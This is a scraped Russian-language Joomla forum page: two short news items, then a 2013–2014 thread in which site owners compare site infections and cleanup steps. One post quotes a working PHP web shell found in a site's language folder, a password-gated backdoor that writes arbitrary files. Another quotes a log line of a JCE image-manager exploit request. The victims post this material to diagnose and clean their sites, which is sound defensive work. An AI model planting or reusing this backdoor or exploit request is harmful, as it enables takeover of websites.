Новости Joomla

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

👩‍💻 20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом взял Евгений Сивоконь.Читать интервью@joomlafeed#joomla #community

20 лет Joomla: Ринат Кажетов

WT AmoCRM - RadicalMart плагин интеграции интернет-магазина на Joomla с CRM

👩‍💻 WT AmoCRM - RadicalMart плагин интеграции интернет-магазина на Joomla с CRM.Плагин умеет отправлять данные заказа из Joomla компонента интернет-магазина RadicalMart в AmoCRM, а так же оставлять примечания к сделке при смене статуса заказа (выберите необходимые статусы заказа RadicalMart в настройках плагина).Возможности плагина - создание сделок в AmoCRM в момент создания заказа в интернет-магазине RadicalMart- выбор воронки AmoCRM, в которой создавать сделки- выбор тега, которым будут помечаться созданные сделки- в комментарий к сделке при создании заказа пишутся:-- точная общая сумма заказа (Amo CRM не принимает дробные значения в поле бюджет, например с копейками)-- статус заказа-- информация о доставке (способ, адрес и комментарий)-- информация о способе оплаты-- контактные данные покупателя (могут отличаться от данных пользователя, создавшего заказ. Например, если доставка для другого человека)-- прямая ссылка на заказ в панели администрирования сайта-- список товаров заказа (опционально)добавление комментария к сделке при изменении статуса заказа в интернет-магазине RadicalMart (выберите необходимые статусы заказа в настройках плагина)-- добавляет в интерфейс просмотра заказа ссылку на сделку в AmoCRM, если таковая обнаружена (соответствие заказов и сделок хранится в базе данных)-- UTM-метки для сделки. Указывает, если на сайте используется комплект плагинов RadicalForm и WT AmoCRM - RadicalForm.
Для работы плагина необходима установка и настройка библиотеки WT Amo CRM library для Joomla версии 1.3.0 и выше.
Плагин бесплатный. Тестировался на Joomla 5.4 и RadicalMart 2.2.4.Страница расширения и скачатьТак же:- Интернет-магазин RadicalMart- WT Amo CRM библиотека интеграции Joomla и AmoCRM- RadicalForm плагин обратной связи- WT AmoCRM - RadicalForm - плагин отправки сообщений из RadicalForm в AmoCRM@joomlafeed#joomla #crm #amocrm #radicalmart

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 52 Ответов
  • 27699 Просмотров
*

prodvigaeff

  • Осваиваюсь на форуме
  • 17
  • 1 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #30 : 13.07.2013, 18:41:37 »
Цитировать
Уже JCE удалил
И компонент и плагин? Кеш чистил? Для пользователя-редактор по умолчанию?
Было такое, но после внесения изменений в конфиг.пхп, редактор TinyMCE нормально работал.
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сай
« Ответ #31 : 13.07.2013, 19:01:07 »
Блин, про плагин забыл. Удалил, в настройках он пропал, но при любом изменении настроек после сохранить/применить опять выдает (страница не доступна). Может это конечно не из за него, просто как-то все одновременно получилось...
Да, и офлайн сообщение и тэги прописаны знаками вопросов.
Записан
*

yevrowl

  • Захожу иногда
  • 268
  • 10 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #32 : 14.07.2013, 21:51:31 »
Появился в каталоге language файл application.php:

Код
<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>

И ещё несколько...
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #33 : 15.07.2013, 08:44:23 »
Цитата: Yurgin от 13.07.2013, 19:01:07
Блин, про плагин забыл. Удалил, в настройках он пропал, но при любом изменении настроек после сохранить/применить опять выдает (страница не доступна). Может это конечно не из за него, просто как-то все одновременно получилось...
Да, и офлайн сообщение и тэги прописаны знаками вопросов.
пере залейте папку administrator из дистрибутива вашей версии должно помочь
не поможет тогда еще папки includes libraries media

Цитата: yevrowl от 14.07.2013, 21:51:31
Появился в каталоге language файл application.php:
и скорей всего не один и скорей всего не в одной папке их может быть и сотни и названия разные
Записан
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: С чем связаны все последние заражения сайтов
« Ответ #34 : 15.07.2013, 12:12:53 »
если перезаливать, то нестандартно названные файлы-то остаются)))
Записан
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #35 : 15.07.2013, 16:31:28 »
Цитата: verstalshik от 15.07.2013, 12:12:53
если перезаливать, то нестандартно названные файлы-то остаются)))
это только чтоб работало то что не работает ^-^
остальное искать надо и удалять  ;)
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #36 : 15.07.2013, 17:04:58 »
Вы меня конечно извините за безграмотность, но что значит перезалить из дистрибутива? Не говоря уже о том стандартно или не стандартно. В каталоге language файла application.php нет, ни в корне, ни в администраторе. Знаки вопроса только в офлайн сообщении и в тэгах в настройках, в материалах тэги прописаны нормально. Я так думаю еслиб дело было в каталоге language, то эта фигня была-бы везде. Поисковик по этим тэгам в принципе находит сайт, они вопросами читаются только в настройках админки, т.ч. этот вопрос для на втором плане, самое противное что я не могу поменять настройки.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #37 : 15.07.2013, 17:51:41 »
Цитировать
самое противное что я не могу поменять настройки.
вот для этого и пере залить, и посмотреть что с кодировкой у вас вопросы это сбой кодировки
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сай
« Ответ #38 : 15.07.2013, 17:56:22 »
Ок. Тогда объясните пожалуйста что значит перезалить. Снести "администратор" и залить из ранее сохраненных? Если так, то я не часто сохраняю файловую часть сайта, и по последней версии сайт выглядел немного по другому. Замена папки "администратор" на что-то повлияет? Или я вобще не так понял перезалить?
И где проверить эту кодировку?
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #39 : 15.07.2013, 22:50:05 »
пере залить=накатить  ^-^ т.е. просто записать папку по верх имеющихся файлов
папку брать только от дистрибутива вашей версии(версия в правом верхнем углу админки пишится) и только от разработчиков
повлияет или нет вопрос к экстрасенсам на нтв адресуйте, мы не знаем что вы делали все время существования сайта
кодировку проверять в файлах utf8 (без ВОМ) должна быть или попробуйте в .htaccess вписать вверх(или любое место) отдельно на строке
Код
AddDefaultCharset utf-8
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #40 : 16.07.2013, 14:01:43 »
Администратор пере залил, в .htaccess строчку вставил, в utf8 не разобрался. В итоге совершенно ничего не изменилось...
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #41 : 16.07.2013, 14:08:19 »
у вас что то повреждено из файлов если не работает сохранить скрипты что .js(скорей всего) что .php
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #42 : 16.07.2013, 15:16:30 »
Извиняюсь, а по русски можно? (что .js что .php) это как понять и что с эти делать?
Записан
*

Ariy84

  • Захожу иногда
  • 144
  • 27 / 1
  • 2+1=4
Re: С чем связаны все последние заражения сайтов
« Ответ #43 : 17.07.2013, 16:12:38 »
Цитата: Yurgin от 16.07.2013, 15:16:30
Извиняюсь, а по русски можно? (что .js что .php) это как понять и что с эти делать?
Божечки! Здесь сайты от вирусяк чистят или танцы с кодировкой проворачивают?
В поиске по форуму наберите "кракозяблы" читайте темы и учитесь. Собственно для этого и сделан форум, зачем писать не по теме то ?
Записан
Плюнь, выпей водки и,.. не пиши. Потомки оценят.
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #44 : 17.07.2013, 18:04:48 »
Цитата: Ariy84 от 17.07.2013, 16:12:38
зачем писать не по теме то ?
Научитесь читать прежде чем писать! Я уже писал что знаки вопроса не основное. Меня волнует то что не сохраняются настройки админки!
Записан
*

heroi_n

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #45 : 22.10.2013, 10:45:33 »
Продолжаем борьбу с //beleiad9 и //kolamne817

Что сделано:
1. Найдены и удалены в папке /images файлы
Цитировать
j.php jos_6stt.php jos_8gkh.php jos_q1cx.php
2. Переместил папку log в другое место, завел новый error.php, за последний час получил вот такую строчку, что это значит?
Цитировать
2013-10-22   06:17:24   INFO   178.124.109.119   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
3. Отключил всех пользователей сайта кроме 2х администраторов
4. Обновил JCE до последней версии и Modules Anywhere до версии 3.3.3
5. На configuration.php и .htaccess установил права 440

Сайт работает, сижу жду что будет.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #46 : 22.10.2013, 11:52:02 »
Цитировать
2. Переместил папку log в другое место, завел новый error.php, за последний час получил вот такую строчку, что это значит?

Код
Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте

а что это читается по другому как то, или трактование различное может быть
Записан
*

heroi_n

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #47 : 22.10.2013, 12:11:04 »
Прошел час. Опять все js "обновились", только теперь не //beleiad9 и //kolamne817 а //mnua8sdi и //kote8aif/*

С логах добавились 2 записи
Цитировать
2013-10-22   07:11:52   INFO   128.73.93.1   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
2013-10-22   08:04:28   INFO   128.73.93.1   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
Админка не открывается, белый лист

Внешние ссылки по результатам http://pr-cy.ru/link_extractor не появились
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: С чем связаны все последние заражения сайтов
« Ответ #48 : 22.10.2013, 14:32:49 »
Цитата: heroi_n от 22.10.2013, 12:11:04
Прошел час. Опять все js "обновились", только теперь не //beleiad9 и //kolamne817 а //mnua8sdi и //kote8aif/*

С логах добавились 2 записиАдминка не открывается, белый лист

Админку закрой или включи http-авторизацию. Проверяй яваскрипты.
На папку/файлы /jmages 500/400
Записан
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: С чем связаны все последние заражения сайтов
« Ответ #49 : 22.10.2013, 15:04:09 »
У меня тоже на хосте один юзверь подхватил заразу, стали абузы приходить на спам. Но у него статические сайты-визитки, проще оказалось всё снести под его аккаунтом и восстановить из бэкапа. Заодно поставил ему и своим визиткам ограничение на кол-во отправляемых писем в час.

В итоге я пришел к выводу, что каждый свой сайт лучше держать под отдельным пользователем. Если один сломают, то другие не пострадают при этом.

Без JCE кстати жить вполне можно, единственно что ткните носом если есть какая-то приблуда для TinyMCE, чтобы удобно фотки было заливать, особенно с фронта.

Как заставить TinyMCE не обрезать код YouTube, я написал тут: http://joomlaforum.ru/index.php/topic,277582.0.html
Это помню первая проблема, которая у меня возникла с ним, когда я начал заниматься сайтами.
« Последнее редактирование: 22.10.2013, 15:08:41 от ChaosHead »
Записан
*

yevrowl

  • Захожу иногда
  • 268
  • 10 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #50 : 05.11.2013, 21:34:33 »
Существуют ли какие-либо заплатки? Возможно установка read-only решает проблему?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: С чем связаны все последние заражения сайтов
« Ответ #51 : 22.11.2013, 15:23:48 »
Нашел в логах. Эт для любителей JCE
Код
/&amp;sa=U&amp;ei=bueDUseYPMKshQe0noGABw&amp;ved=0CHwQFjAbOLwF&amp;usg=AFQjCNHWRXiTgfgzyuY4cvOXXQcvg9re2Q/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b  HTTP/1.1" 200 22522 "-" "BOT/0.1 (BOT for JCE)"
Записан
*

rishard

  • Захожу иногда
  • 71
  • 3 / 3
Re: С чем связаны все последние заражения сайтов
« Ответ #52 : 27.01.2014, 19:01:59 »
Цитата: flyingspook от 04.05.2013, 11:17:29

остальное все не существенно, массово ломятся через п.2 и п.3


Так, да не вполне так.
Вытащил из логов своего сайта уйму небезинтересных сведений на тему.
Результаты довольно забавны; кому интересно - гляньте. Удалось вычислить ряд наиболее взламываемых расширений (com_jce на первом месте по популярности, согласен), перечень злонамеренных web-ресурсов, используемых в атаках, ну и - ряд наиболее часто употребленных сценариев.
« Последнее редактирование: 27.01.2014, 19:05:25 от rishard »
Записан
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

 Ответов: 41
Просмотров: 8106 		Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

 Ответов: 356
Просмотров: 79638 		Последний ответ 13.09.2019, 18:49:33
от diana1975
Домены.ru и.рф сайтов злоумышленников будут разделегироваться

Автор voland

 Ответов: 7
Просмотров: 1270 		Последний ответ 26.05.2016, 15:08:34
от flyingspook
Взломали сеть сайтов на Joomla

Автор kanbodows

 Ответов: 9
Просмотров: 2208 		Последний ответ 23.09.2015, 00:25:36
от flyingspook
Проверенные методы проверки сайтов на вирусы

Автор Mehanick

 Ответов: 6
Просмотров: 2965 		Последний ответ 07.09.2015, 00:02:59
от winstrool